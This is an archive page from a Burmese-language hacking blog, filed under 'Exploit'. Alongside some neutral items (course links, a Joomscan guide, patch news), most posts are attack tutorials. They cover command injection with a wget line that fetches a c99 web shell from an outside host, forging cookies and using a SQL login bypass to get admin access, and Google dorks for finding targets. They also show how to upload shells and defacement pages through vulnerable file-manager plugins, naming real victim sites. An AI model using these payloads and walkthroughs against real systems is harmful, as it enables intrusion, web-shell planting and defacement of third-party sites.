Showing posts with label Exploit. Show all posts
Showing posts with label Exploit. Show all posts

Saturday, January 26, 2013

Offensive Security Lab Exercises


စာအုပ္ေကာင္းေလးေတြ႕လို႕တင္ေပးလိုက္တာ .....ေလ့လာၾကည့္ လိုက္ ေတာ္ေတာ္ မိုက္တယ္ဗ်...
ပါလာတဲ့ Module ေတြကေတာ့ေအာက္ပါအတိုင္ျဖစ္ပါတယ္...။

  1. Backtrack Basics
     
  2. Information Gathering Techniques
     
  3. Open services Information Gathering
     
  4. Port Scanning
     
  5. ARP Spoofing
     
  6. Buffer Overflow Exploitation
     
  7. Working with Exploits
     
  8. Transferring Files
     
  9. Exploit Framework
     
  10. Client Side Attacks
     
  11. Port Fun
     
  12. Password Attack
     
  13. Web Application Attack Vector
     
  14. Trojan Horses
     
  15. Window Oddities
     
  16. Rootkits

Download

လင့္မေကာင္းလွ်င္ေျပာပါ.......ျပန္တင္ေပးပါမည္
Read More ->>

Monday, August 13, 2012

How to use Joomscan to find the Joomla Vulnerability in Backtrack 5 Linux?



တစ္ကယ္ေတာ့ Jommla scan သံုးတယ္ဆိုတာ Hacking လုပ္တယ္လို႕မဆိုလိုႏိုင္ဘူးဗ်...။ယိုေပါက္ vulnerability ေတြကို Jommla CMS ထဲမွာေပါက္မေပါက္စစ္ေပးတာဗ်..ေနာက္ဆံုးထြက္ Updated version ဆိုရင္ Vulnerabilities 550 ေလာက္ကိုစံုစမ္းေထာက္လွမ္း ေပးႏိုင္တယ္..။ဒါကိုဘယ္လိုအသံုးျပဳရမလဲဆိုတာ ကိုကၽြန္ေတာ္တင္ျပေရးသားေပးပါ့မယ္...။ Jommla scan မရိွလွ်င္ jommla scan ကိုေအာက္ပါေနရာတြင္ေဒါင္းလုပ္ဆြဲလိုက္ပါ...။

http://web-center.si/joomscan/joomscan.tar.gz

 ေနာက္တစ္ဆင့္အေနနဲ႕ကေတာ့ ေအာက္ေဖာ္ျပပါ directory အတိုင္းထားေပးလိုက္ပါ...။

/pentest/web/scanners/joomscan/



 ေနာက္တစ္ဆင့္အေနနဲ႕ကေတာ့ Joomscan ကို set permission လုပ္ဖို႕လိုပါေသးတယ္..ဘယ္လိုလုပ္ရမလဲဆိုရင ္Terminal ထဲကိုသြာျပီးေအာက္ပါ commands မ်ားကိုရိုက္ထည့္လိုက္ပါ..။

CHMOD 0777 joomscan.pl



 ေနာက္တစ္ဆင့္ကေတာ့ ေနာက္ဆံုးထြက္ version ကို update လုပ္ရမယ္..အဲလိုလုပ္မယ္ဆိုရင္ Terminal ထဲကပဲ ၀င္ျပီးေတာ့ ေအာက္ပါ commands ေတြကိုရိုက္ထည့္လိုက္ပါ...။
./joomscan.pl update



ဒါဆိုရင္အားလံုး OK ျပီ..စလို႕ရျပီ...ကၽြန္ေတာ္တို႕ Jommla scan ကိုသံုးျပီးေတာ့ ယိုေပါက္ေတြကို စတင္ ေထာက္လွမ္းႏိုင္ပါျပီ ထိုေဖာက္၀င္ေရာက္ျခင္းအတြက္ကေတာ့ ကိုယ္ရဲ႕ Hacking scale နဲ႕ဆိုင္ပါတယ္....။ Terminal ထဲကိုသြားျပီးေတာ့ေအာက္ပါ command ကိုသံုးျပီစတင္ စစ္ေဆးႏိုင္ပါျပီ...။

 ./joomscan.pl -u www.YourJoomlasite.com.. 



www.YourJoomlasite.com ဆိုတဲ့ေနရာမွာ သင့္ Terget ဆိုက္ကိုထည့္ပါ...။ျပီးရင္ စစ္ေဆးေနတဲ့အခ်ိန္ကို ခဏေစာင့္ပါ....။ယိုေပါက္ရိွပါက ေဖာ္ျပေပးပါလိမ့္မယ္...။လံုျခံဳေရးအားေကာင္းတဲ့ ဆိုက္မ်ားအတြက္ အာမ မခံပါ...။

Shwekoyantaw....
Read More ->>

Tuesday, July 31, 2012

Microsoft to patch three critical vulnerabilities on Tuesday




ျပီးခဲ့တဲ့ တစ္ပတ္ အဂၤါေန႕ က Microsoft Security TechCenter ထိပ္တန္းအဆင့္ ရိွ vulnerabilities (ယိုေပါက္မ်ား၊အားနည္းခ်က္ေနရာမ်ား) ကိုတရား၀င္ ေက်ညာခ်က္ထုတ္ျပန္ ခဲ့ပါတယ္..ထိုသို႕ေက်ညာခ်က္ထုတ္ျပန္ရာတြင္..အထူးအေရးၾကီးေသာထိပ္ထန္းအဆင့္ယိုေပါက္ မ်ားအျပင္…ေနာက္ထပ္အေရးၾကီးေသာ အားနည္းခ်က္ယိုေပါက္ (၆) ခုကိုလဲတစ္ခါထဲ ထုတ္ျပန္ေက်ညာခ်က္ေပးခဲ့ပါတယ္…။ထိုသို႕ထုတ္ျပန္ရာတြင္ အားနည္းခ်က္ (၉) ခုစလံုးကိုတစ္ခါတည္းေဖာ္ျပထားျပီးေတာ့ ..အဲဒီ ထဲ က(၃)ခုဟာ…Critical အဆင့္ရိွေၾကာင္းႏွင့္ က်န္(၆) ခုမွာ Important အဆင့္ျဖစ္ေၾကာင္း တရာ၀င္ေၾကညာ စာတမ္း ထုတ္ျပန္ခဲ့တာျဖစ္ပါတယ္…။

ထိုကဲ့သို႕ (Critical) အဆင့္ရိွ အထူးအေရးၾကီးေသာအားနည္းခ်က္ ယိုေပါက္(၃) ခုထဲတြင္ စိတ္၀င္စားစရာအေကာင္းဆံုးအခ်က္မွာ..ထိုယိုေပါက္အားနည္းခ်က္(၃) တစ္ခုေသာယိုေပါက္ ဟာ Explorer 9 တြင္ပါ၀င္ေနျခင္းျဖစ္ပါတယ္…။ဒိထက္ပိုျပီးစိတ္၀င္စားစရာေကာင္းတာတစ္ခ်က္က ဒီအားနည္းခ်က္ယိုေပါက္ဟာ  Microsoft ထုတ္ကုန္ Browser ေတြထဲက အရင္ တုန္းက ထုတ္လုပ္ခဲ့တဲ့ version ေတြထဲမွာမရိွခဲ့ဘူးဆိုတာပါပဲ..။ဒီယိုေပါက္ဟာ ခုမွေရႊထီးေဆာင္းျပီးေရာက္လာတဲ့အတြက္ နည္းနည္းေတာ့ ေမးခြန္း ထုတ္ခ်င္ စရာေတာ့ေကာင္းပါတယ္…။

ေနာက္ထပ္ (Critical) အဆင့္ရိွအားနည္းခ်က္ယိုေပါက္ ႏွစ္ခုကေတာ့ အရမ္း အႏၱရာယ္မ်ားတဲ့ malicious user ေတြကို Windows operating systems ထဲကို execute code မ်ားကို ထည့္သြင္း ၀င္ေရာက္ခြင့္ျပဳျပီးေတာ့ ထိန္းခ်ဳပ္ခြင့္ ျပဳေစျခင္းျဖစ္တယ္လို႕ အဲဒီ ထုတ္ျပန္ေက်ညာ စာတမ္းမွာေဖာ္ျပထားပါတယ္…။အဲဒီယိုေပါက္ေတြဟာ Window OS မွာ server ( ထိန္ခ်ဳပ္သူ)   ႏွင့္ client ( ထိန္ခ်ဳပ္ခံရျခင္း/သူ) တို႕ကို ပါ support ျပဳလုပ္ေပးထားပါတယ္…။

အမ်ားေမွ်ာ္လင့္ထားတဲ့အတိုင္း ယခုအခ်ိန္မွာျပင္းထန္ယိုေပါက္တစ္ခုျဖစ္လာတဲ့ Microsoft XML Core Services မွ အားနည္းခ်က္ ယိုေပါက္ဟာ CVE-2012-1889 ( CVE =Common Vulnerabilities and Exposures ) ,( CVE-2012-1889 ဆိုတာ CVE ID တစ္ခုျဖစ္) မွာထင္ေပၚလာကာ ျပဳျပင္ ဖာေထးရမယ့္အခ်က္ တစ္ခ်က္ျဖစ္လာ ျပီလို႕ “Vulnerability Management and Penetration Testing service တစ္ခုျဖစ္ေသာ Rapid7 မွသုေတသနျပဳလုပ္သူတစ္ေယာက္ျဖစ္တဲ့ Marcus Carey ကထုတ္ေဖာ္ေျပာၾကားခဲ့ပါတယ္…။

ျပည့္ စံုစြာေလ့လာခ်င္သူမ်ားအတြက္ အခ်က္အလက္အျပည့္အစံုကို Microsoft ရဲ႕ တရား၀င္ security  ပိုင္းဆိုင္ရာထုတ္ျပန္ခ်က္မ်ားကို အပတ္စဥ္ အဂၤါေန႕တိုင္းသြားေရာက္ ေလ့လာႏိုင္ပါတယ္…။
Go Here

posted by Me
You also see in ghostarea.net
ref: thehackernew
Read More ->>

Remote Command Execution



Remote Command Execution ကိုလည္း Remote Code Execution လုိပဲ RCE လို႕ေခၚၾကပါတယ္ အေခၚအေ၀ၚဆင္သလို Attack လုပ္ပံုလည္း ဆင္တူပါတယ္ ။ Remote Command Execution ဆိုေတာ့အတိုင္း Remote Command ေတြ Execute လုပ္ခြင့္ေပးတာကို ဆိုလိုတာပါ ။

Code


<?php
$cmd=$_GET['cmd'];
system($cmd);
?>

ဒီလိုသာျဖစ္ေနရင္ ကၽြန္ေတာ္တို႕ www.site.com/index.php?cmd=whoami ဆိုျပီး whoami command ေပးရင္ Server User Name တက္လာပါလိမ့္မယ္ ။ အဲ့ဒီလိုပဲ Command Execute လုပ္ႏုိင္တဲ့ အျခားေသာ PHP Function ေတြလည္းရွိပါေသးတယ္ ။

အဲ့ဒါေတြကေတာ့

exec — Execute an external program
passthru — Execute an external program and display raw output
shell_exec — Execute command via shell and return the complete output as a string
system — Execute an external program and display the output

တို႕ျဖစ္ပါတယ္ ။

Command ေပးတဲ့ေနရာမွာ whoami လို Command မေပးပဲ wget http://www.sh3ll.org/c99.txt? -O shell.php လို We Get Command ေပးလိုက္ရင္ Shell ကိုယူျပီး .php အျဖစ္ Out Put FIle ထုတ္သြားမွာျဖစ္ပါတယ္ ။

www.site.com/index.php?cmd=wget http://www.sh3ll.org/c99.txt? -O shell.php

အမွန္အတိုင္းေျပာရရင္ အေပၚက Example Vuln က Theory ဆန္လြန္းပါတယ္ ။ တကယ့္လက္ေတြ႕မွာျဖစ္သြားတာေလးေတြၾကည့္လိုက္ရေအာင္ ။

Example 1 :

Code from dig.php


<?php
include("common.php");
showMenu();
echo '<br>';
$status = $_GET['status'];
$ns  = $_GET['ns'];
$host   = $_GET['host'];
$query_type   = $_GET['query_type']; // ANY, MX, A , etc.
$ip      = $_SERVER['REMOTE_ADDR'];
$self   = $_SERVER['PHP_SELF'];
$host = trim($host);
$host = strtolower($host);
echo("<span class=\"plainBlue\"><b>Executing : <u>dig @$ns $host $query_type</u></b><br>");
echo '<pre>';
//start digging in the namserver
system ("dig @$ns $host $query_type");
echo '</pre>';
} else {
?>

ကၽြန္ေတာ္တုိ႕စိတ္၀င္စားတာ အပိုင္းေလးတစ္ပုိင္းပါပဲ ။ Remote Command Execute လုပ္ခြင့္ရွိမယ့္ အပိုင္းေလးတစ္ပိုင္းပါ ။

$ns  = $_GET['ns'];
system ("dig @$ns $host $query_type");

အဲ့ဒီ့မွာ ns variable ဟာ Filer လုပ္ထားျခင္းမရွိပါ ။ ဒါေၾကာင့္ Attacker က ၾကည့္တဲ့ Command Execute လုပ္ခြင့္ရွိပါတယ္ ။
www.site.com/dig.php?ns=whoami&host=ghostarea.net&query_type=NS&status=digging
whoami ဆိုတဲ့ Command ကို Execute လုပ္ဖို႕ၾကိဳးစားေပသိ Execute ျဖစ္သြားမွာမဟုတ္ပါဘူး အေၾကာင္းရင္းကေတာ့ Code က ဒီလိုသြားမွာျဖစ္မွာမို႕လို႕ပါ ။

system ("dig whoami ghostarea.net NS");

ဒီလို  Command မရွိတဲ့အတြက္ အလုပ္လုပ္မွာမဟုတ္ပါဘူး ။ ဒီေတာ့ ကၽြန္ေတာ္တို႕  တမ်ိဳးစဥ္းစား၇ပါလိမ့္မယ္။ Terminal မွာ အသံုးျပဳခြင့္ရွိတဲ့ And Operator || ကို သံုးပါ့မယ္ ။

www.site.com/dig.php?ns=||whoami||&host=ghostarea.net&query_type=NS&status=digging

ဒါဆုိရင္ code က ဒီလိုျဖစ္သြားပါ့မယ္

system ("dig ||whoami|| ghostarea.net NS");

ဒီလိုဆိုမွ dig နဲ႕ ghostarea.net NS ၾကားမွာျခားျပီး Command အျဖစ္ Execute လုပ္သြားမွာျဖစ္ပါတယ္ ။

posted by negative thunder
copy from mhf
Read More ->>

Remote Code Execution



Remote Code Execution ဆိုတာ RCE လို႕ အတိုေကာက္ေခၚၾကတဲ့ အေတြ႕ရမ်ားတဲ့ Web Vuln ေတြထဲက တစ္ခုျဖစ္ပါတယ္ ။
ထံုးစံအတုိင္း ဘယ္လိုေတြ ေပါက္လဲ ဘယ္လို ေနရာေတြမွာေပါက္သြားလဲ တစ္ခ်က္ၾကည့္ရေအာင္ ။
How Vulnerability comes?

Code


[color=#00ff00][size=1][font=Verdana,Arial,Tahoma,Calibri,Geneva,sans-serif]<?php[/font]
[font=Verdana,Arial,Tahoma,Calibri,Geneva,sans-serif]$code=$_GET['code'];[/font]
vuln[font=Verdana,Arial,Tahoma,Calibri,Geneva,sans-serif]($code);[/font]
[font=Verdana,Arial,Tahoma,Calibri,Geneva,sans-serif]?>[/font][/size][/color]

Code ထဲက vuln ဆိုတဲ့ Function ဟာ string ကို PHP Code အျဖစ္နဲ႕ ေျပာင္းလဲေပးသြားမွာျဖစ္ျပီး အဲ့ဒါေၾကာင့္ ကၽြန္ေတာ္တုိ႕ဟာ Code ေတြကို Execute လုပ္ခြင့္ရွိမွာ ျဖစ္ပါတယ္
တကယ္ေတာ့ ဒီဟာက သီအိုရီဆန္လြန္းပါတယ္ လက္ေတြ႕မွာျဖစ္တတ္တဲ့ အေၾကာင္းအရာေလးေတြ ၾကည့္ရေအာင္

Type 1 :

Blog တစ္ခုထံုးစံအတုိင္း Comment ေပးတဲ့ေနရာ ရွိမယ္ ။
Comment Form ဆိုတဲ့အတိုင္း Submit Form နဲ႕ Comment.php ကို ခ်ိတ္ထားမယ္ေပါ့ ။ submit.php နဲ႕ comment.php ဆိုပါစို႕
Submit.php ကိုၾကည့္ရေအာင္

submit.php

Code:

[color=#00ff00][font=Times New Roman,serif][size=3]<[/size][/font][font=Times New Roman,serif][size=3]form method="POST" action="">[/size][/font]
[font=Times New Roman,serif][size=3]<textarea rows="10" name="comments" cols="60"></textarea>
<p><input type="submit" value="Post" name="sub"></p>
</form>[/size][/font][/color]

Comment.php ကိုၾကည့္ရေအာင္

comments.php

Code:

<?php
[color=#00ff00][font=Times New Roman,serif][size=3]$comments = $_POST['comments'];
$log = fopen('comments.php','a');
fwrite($log,'<br />'.'<br />.'<center>'.'Comments::'.'<br />'.$comments);
fclose($log);
?>[/size][/font][/color]

ဒီလိုဆိုရင္ submit form က သြင္းသမွ်ကို Comment.php မွာ သြားျပီး သက္ေရာက္ေနမွာျဖစ္ပါတယ္ ။ ဒါေၾကာင့္ Malicious Code ကို Inject လုပ္လုိက္ရင္ ျဖစ္လာမယ့္ အက်ိဳးဆက္က ????
အခုေျပာသြားတာက Post Method ကေန ေပါက္သြားတဲ့အေၾကာင္း Get Method ဆိုရင္ေရာ...

Type 2 :

Code:

 [color=#00ff00][font=Times New Roman,serif][size=3]<?php
$msg = $_GET['msg'];
$ip = getenv('REMOTE_ADDR');
$error = fopen('errorlog.php','a');
fwrite($error,'<br />'.$msg.'<br />'.$ip.'<br />');
fclose($error);
?>[/size][/font][/color]

ဒီလိုေနရာမွာဆိုရင္ RCE သာမကဘူး XSS လိုဟာမ်ိဳးပါ Inject လုပ္ႏုိင္ပါမယ္ ။
အိုေခ ဒါဆို Attacker ဘယ္လို Attack လုပ္သြားတယ္ဆုိတာကို ဆက္ရေအာင္ ။

How they Attack?

Attacker က ခုနက Type 2 လို Get Method မွာ RCE ေပါက္ေနတာကို ေတြ႕ျပီဆိုပါစို႕ ဒါဆို String တစ္ေၾကာင္း ေခၚျပီး Attack လုပ္ပါမယ္ တျခားေနရာက Shell ကို ေခၚယူခိုင္းလိုက္တာမ်ိဳးေပါ့

www.site.com/vuln.php?hack=1 ဆိုပါစို႕
အဲ့လိုေနရာမွာ
www.site.com/vuln.php?hack=<?system(‘wget http://www.sh3ll.org/c99.txt? -O shell.php’);?>

ေနာက္က <?system(‘wget http://www.sh3ll.org/c99.txt? -O shell.php’);?> ဆိုတာကို နည္းနည္းေျပာဖို႕ လိုမယ္ထင္ပါတယ္

wget ဆိုတာ we get ပါ တျခားေနရာက ယူမယ္ေပါ့ ဘာကို ယူမလ www.sh3ll.org/c99.txt ကို ယူမယ္
-O ဆိုတာ Out put အျဖစ္ထြက္ပါေပါ့ ဘယ္လို ထြက္ရမလဲ c99.txt ဆိုတဲ့ text file ကုိ shell.php ဆုိတဲ့ PHP File အျဖစ္ ထုတ္ပါလုိ႕ ေျပာလိုက္တာပါ .. ဒါဆို ဘာဆက္လုပ္မလ ဆိုတာ သိေလာက္ပါျပီ ;-)

Countermeasures

အကယ္၍မ်ား ; ကို ကန္႕သတ္လိုက္မယ္ဆိုရင္ PHP Code ေတြအလုပ္လုပ္ေတာ့မွာမဟုတ္ပါဘူး 
 
post by negative thunder
copy from MHF
Read More ->>

Insecure Cookie Handling



Web Server ေတြရဲ႕ Cookie Handle အလြဲကေန admin access ရယူသြားတဲ့ Vuln ျဖစ္ပါတယ္။
ဥပမာ vuln.php ရဲ႕ Code ကို တစ္ခ်က္ၾကည့္လိုက္ပါ ။

Code


if($_POST['password'] == $thepass) {
setcookie("is_user_logged","1");
} else { die("Login failed!"); }
............ etc .................
if($_COOKIE['is_user_logged']=="1")
{ include "admin.php"; else { die('not logged'); }

သူ႕မွာ  လြဲသြားတဲ့အေၾကာင္းအရာက "is_user_logged" ဆိုတဲ့ Variable ျဖစ္ပါတယ္ Browser ထဲက Cookie ရွိရင္ Vale 1 အျဖစ္သတ္မွတ္ျပီး Log in အ၀င္ခံလိုက္တဲ့ သေဘာပါ အဲ့ဒီ့မွာပဲ

javascript:document.cookie = "is_user_logged=1; path=/";

ဆိုျပီး Javascript Inject လုပ္လိုက္ရံုနဲ႕ Log in ၀င္ျပီးသားျဖစ္သြားပါ့မယ္ ။

Online Email Manager မွာ ေပါက္သြားတဲ့ Vuln အေၾကာင္းၾကည့္လုိက္ရင္ ပိုျပီး သေဘာေပါက္သြားမွာပါ ။

DorK : Powered by Online Email Manager

အဲ့ဒီ့မွာ http://www.site.com/demo/OEM/admin/index.php ဆိုပါစို႕ အဲ့ဒီ့မွာ

javascript:document.cookie = "auth=admin; path=/"; လို႕ Javascript Inject လုပ္လိုက္ျပီး emailList.php ( http://www.site.com/demo/OEM/admin/emailList.php )


ကိုသြားလိုက္ရံုနဲ႕  Admin အျဖစ္ Login ၀င္ေနျပီးသားျဖစ္တာ ေတြ႕မွာပါ

Ref : SirGod
post by negative thunder
copy from MHF
Read More ->>

Monday, July 2, 2012

helpmandruk - SQL Injection Vulnerability

 
 
 
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0         _                                __              __      __                                     1
1    /' \                   __  /'__`\      /\ \__  /'__`\                                  0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___               1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\             0
0         \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/                    1
1          \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\                    0
0           \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/                    1
1                                  \ \____/ >> Exploit database separated by exploit    0
0                                   \/___/                type (local, remote, DoS, etc.)        1
1                                                                                                                                           1
0   [x] Official Website: http://www.1337day.com                                                 0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                             1
0                                                                                                                                           0
1                           $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$                    1
0                           I'm dencowbie Member From Inj3ct0r TEAM                              1
1                           $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$                    0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
==========================================================================
<<<:>>>           helpmandruk - SQL Injection Vulnerability                 <<:>>>
==========================================================================
- About Me:
>>>> dencowbie - Independent Security Research
>>>> dencowbie@gmail.com >>> x CP: +62857-2874-7705
>>>> thecorneroflinux.com

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
>>>> Author         : Dencowbie
>>>> Category     : Webapps / 0day
>>>> Title Exploit : helpmandruk - SQL Injection Vulnerability
>>>> date         : 28-06-2012
>>>> vendor  : helpmandruk
>>>> URL vendor    : http://www.helpmandruk.nl
>>>> Google Dork   : inurl:"/aanbod.php?id="
>>>> 0day exploits : 1337day.com Inj3ct0r Exploit DataBase
                                  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

- Affected items (SQLi):
http://127.0.0.1/webapps/aanbod.php?id=[SQLi]
- Sample WebApps Vuln (SQLi):
>>>> http://www.autonautic.nl/aanbod/aanbod.php?id=10' + [SQL Injection]
>>>> http://www.recvastgoed.nl/aanbod.php?id=20'  + [SQL Injection]
>>>> http://www.2cvgarage.nl/aanbod/aanbod.php?id=561'  + [SQL Injection]
>>>> http://www.ukuntmijkopen.nl/Aanbod.php?ID=230' + [SQL Injection]

, And Many More @ Google...!!!
- Special Thanks:
>>>>> 1337day - Inj3ct0r TEAM
>>>>> All Staff & 31337 Member Inj3ct0r TEAM,,,
>>>>> All people of crocodiles forgetful

# 1337day.com [2012-06-28]
Read More ->>

Sunday, May 13, 2012

IIS Website Hacking with Windows 7



အရင္ကကၽြန္ေတာ္ ကၽြန္ေတာ့ဆိုက္ထဲမွာ IIS Hacking အေၾကာင္းတင္ေပးဘူးပါတယ္......။အဲဒီတုန္းက
တင္ေပးထားတာျပည့္ျပည့္စံုစံုပါပဲ .........။ဒါေပမယ့္ Ebook အေနနဲ႕ သိမ္းခ်င္သူမ်ားအတြက္.......
ethickiddie ေရးသာတဲ့စာအုပ္ေလးရိွပါတယ္......။ကၽြန္ေတာ္ကစာအုပ္ေတြလုပ္မေပးႏိုင္ေသးပါဘူး ....။
ဒီစာအုပ္ထဲမွာလဲေတာ္ေတာ္ေလးကိုျပည့္စံုေအာင္ေရးသာထားတာပါ.........။
လိုခ်င္ရင္ေဒါင္သြားလိုက္ပါ........။

Download 1
Download 2
Read More ->>

Saturday, May 12, 2012

Basic DNN Hacking Tutorial


3thic0kiddi3 ေရးတဲ့ DNN (DOT NET NUKE) hACKING စာအုပ္ျဖစ္ပါတယ္.....။ဒီနည္းလမ္းကေတာ့
WEB Hacking နည္းေတြထဲမွာ အလြယ္ကူ ဆံုးနည္းလမ္းလို႕လဲေျပာလို႕ရပါတယ္............။
သိပ္နားမလည္ရင္ေတာ့ ကၽြႏ္ေတာ့္ Cbox ထဲမွာ massage ခ်န္ခဲ့လို႕ရပါတယ္.......။

Download
http://downloads.ziddu.com/downloadfile/19283229/BasicDNNHackingTutorialBy3thic0kiddi3.pdf..html
Link 2
Read More ->>

Wednesday, April 18, 2012

HOW TO HACK WEBSITES ADMIN PANEL



1. search google for adminlogin.asp
2.click on any link
3.in the username field type admin
4. in the password field type 'or''='

UR DONE........
:-)
Enjory.../
post by aung Latt
Read More ->>

Tuesday, April 17, 2012

EzFilemanager Deface Upload vulnerability


Google Dork inurl:ezfilemanager/ezfilemanager.php


Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

Go to this url : website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php
and 
put ?sa=1&type=file after URL
now url will be :  http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

ကြ်န္ေတာ္တို ့ေတြအဲ့မွာ  ,html ,pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files ေတြ upload တင္နုိင္မွာျဖစ္ပါတယ္...
ကြ်န္ေတာ္ကေတာ့ txt ဖုိင္ေလးဘဲတင္ျပထားတယ္..

http://www.hollywood-arts.org/tinymce/jscripts/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=image






အဲ့မွာ ကြ်န္ေတာ္ အနီနဲ ့၀ုိက္ ျပထားပါတယ္.. အဲ့ဖုိင္ေတြကို ဆုိဒ္မွာ တင္ခြင့္၇ွိမွာျဖစ္ပါတယ္...
ပုံနည္းနည္းေသးသြားတယ္ဗ်ာ.. ctrl ခလုတ္ကို ဖိျပီး mouse ဘီး ေလးနဲ ့အတုိးအခ်ဲ ့လုပ္ၾကည့္လုိက္ပါ...
အဲ့မွာတင္ျပီးသြားရင္ေတာ့  browse တည္းျပန္သြားလုိက္ပါ.. သင့္ဖုိင္ေလး ေရာက္ေနတာေတြ ့ပါလိမ့္မယ္...


ကဲအဲ့ဖုိင္ေလး ကို ကလစ္နုိပ္လုိက္မယ္ဆုိရင္ေတာ့ သင္ တင္ထားတဲ့ဖုိင္ကို ျမင္ရမွာျဖစ္ပါတယ္..
ကဲ သြားၾကည့္လုိက္ပါ.. ကြ်န္ေတာ္တင္ထားတာေလး

http://www.hollywood-arts.org/ez-images/chg.jpg

source By http://cyberhackergroup.multiply.com/journal/item/44
Read More ->>

XCode SQL Injection/LFI/XSS Vulnurable & Webshell Scanner



USAGE:
Once downloaded, extract all the files and run XCodeXploitScanner.exe, insert your dork, Click Dork It and it will collect links from Dork you enter and displays the list. after displaying List, you will be able to conduct SQL injection vulnerability scanning / Local File Inclusion / Cross Site Scripting on the web that is in the list. This tool will send the injection parameters to the web as’ – * /../../../../../../../../../../../../. . / .. / etc / passwd% 00 “> alert (” XSS Xcode Exploit Scanner detected “). If the Web has a bug then the status will appear: www.target.com?blabla.php?=1234: SQLi Vulnerable.
www.target.com?blabla.php?=1234/../../../../../../../../../../../../. . / .. / etc / passwd% 00 LFI Vulnerable
www.target.com?blabla.php?=1234 “> alert (” XXS Xcode Exploit Scanner Detected “) XSS Vulnerable
At the status list is detected, you can click Open Vuln Link with Browser to display on your browser
This tool also adds webshell hunter, where you can search the web shell C99, R57, C100, ITsecteam_shell, b374k, which had been uploaded by the hackers.
Perhaps there are many shortcomings or bugs are not known by the author. But at least this tool you can make it easier to find targets.
================================================================
Credits:
Code name : .::XCode Exploit – Vulnurable & webshell Scanner::.
Description : – SQLI/LFI/XSS/Webshell Hunter with Google Engine -
Compiler : Microsoft Visual Basic 6.0
Author : poni
System : Windows 95, 98, XP, Vista, 7
Size : 1,38 mb
Update : I`m not sure where will i put it. Just
check the sites below
http://www.xcode.or.id
http://ferdianelli.wordpress.com
================================================================
Info :
XCode Exploit – Vulnurable & webshell Scanner help you to
gather the dorks Link from Google. then you may check the
results if its Vulnurable to exploit with SQL injection commands
, LFI,and XSS. And You may hunt the webshells those uploaded.
=================================================================

Download
Read More ->>

Tuesday, April 10, 2012

[MOWPOP] Plugin WP-CONTENT In WordPress Upload Exploitation




Google Dork : inurl:mowpop
Dork နဲ႕ရွာလို႕ရတဲ့ ဆိုဒ္ေတြက်လာရင္ /wp-content/plugins/mowpop/submit.php ဆိုျပီး ဆက္သြားလိုက္ပါ
ဥပမာ က်လာမယ့္ဆုိဒ္က www.target.com/topics/mowpop ဆိုပါစို႕ ဒါဆို www.target.com/wp-content/plugins/mowpop/submit.php ဆိုျပီး သြားလိုက္ပါ
Image Upload လုပ္ခြင့္ရတာေတြ႕ရပါလိမ့္မယ္ ဒါဆို Shell Type ကို Image File Type တစ္ခုခုေျပာင္းပါ
ဥပမာ c99.php%.gif ေပါ့
မိမိ တင္ထားတဲ့ Shell ကိုေတာ့ ေအာက္ပါ Directory မွ တစ္ဆင့္ Access လုပ္ႏိုင္ပါျပီ
wp-content/plugins/mowpop/editor/forms/pictures/User-Uploads/c99.php%5C0.gif
ဥပမာ www.target.com/wp-content/plugins/mowpop/editor/forms/pictures/User-Uploads/c99.php%5C0.gif
REF:1337 Days

post by ghost area(ghostarea.net)
Read More ->>

Thursday, April 5, 2012

SPAW Vulnerably [ Tutorials ]


ပထမဆံုး Google Dork ရွာမယ္.....။google.com မွာ ေအာက္ကကုတ္ေတြကို ရွာလိုက္ပါ.......။

inurl:spaw2/dialogs/
Or
inurl:spaw2/uploads/files/





ေပၚလာတဲ့ဆိုက္တစ္ခုကိုေရြးလိုက္ပါ....။


 ေပၚလာတဲ့ ဆိုက္ URL ေနာက္ကေအာက္ပါ statement ေတြထည့္လိုက္ပါ......။

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da75 2d9 8cac9

ဥပမာ........http://olgabz.com ဆိုပါရင္ ေအာက္ပါအတိုင္းျဖစ္ပါသည္။

http://olgabz.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da75 2d9 8cac9



၀ဘ္ဆိုက္ေပါက္ေနရင္ အထက္ပါအတိုင္းဖိုင္ေတြ ေပၚေနလိမ့္မယ္...။ျပီးရင္ image ကို File အျဖစ္ေရြး လိုက္ပါ။ေအာက္ကပံု ကိုၾကည့္ပါ။

 ျပီးရင္ Browse ကိုႏွိပ္ ျပီးရင္ ကိုယ့္ Deface page ကိုတင္လိုက္ပါ....။



ရတယ္ဆိုရင္ ကိုယ့္ ဖိုင္နာမည္ေပၚေနလိမ့္မယ္.....။ကၽြန္ေတာ္ မ်ည္းသားထားတယ္.....။
ကိုယ့္ deface page result ကိုရွာခ်င္တယ္ဆိုရင္ ေအာက္ပါအတိုင္းျပန္ရွာႏိုင္ပါတယ္......။
http://olgabz.com/spaw2/uploads/files/shwekoyantaw.html
shwekoyantaw.html ေနရာမွာ သင့္ဖိုင္နာမည္ကိုထည့္ပါ...။

Demo Link:http://olgabz.com/spaw2/uploads/files/shwekoyantaw.html

P.S:
